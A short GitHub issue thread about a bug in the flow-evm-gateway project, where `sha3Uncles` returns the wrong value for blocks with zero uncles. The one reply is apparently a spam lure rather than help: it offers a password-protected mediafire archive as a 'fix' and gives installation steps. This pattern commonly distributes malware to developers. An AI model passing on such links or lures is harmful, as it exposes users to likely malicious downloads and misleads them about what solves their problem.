### ISSUE TITLE
`sha3Uncles` does not return proper value for 0 uncles

### ISSUE THREAD

**Issue by m-Peter** [onflow/flow-evm-gateway#503]
The return value should be: https://github.com/ethereum/go-ethereum/blob/ab3ee99ca9aa46163f1dfbaf10260718d8de9e10/core/types/hashes.go#L30

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
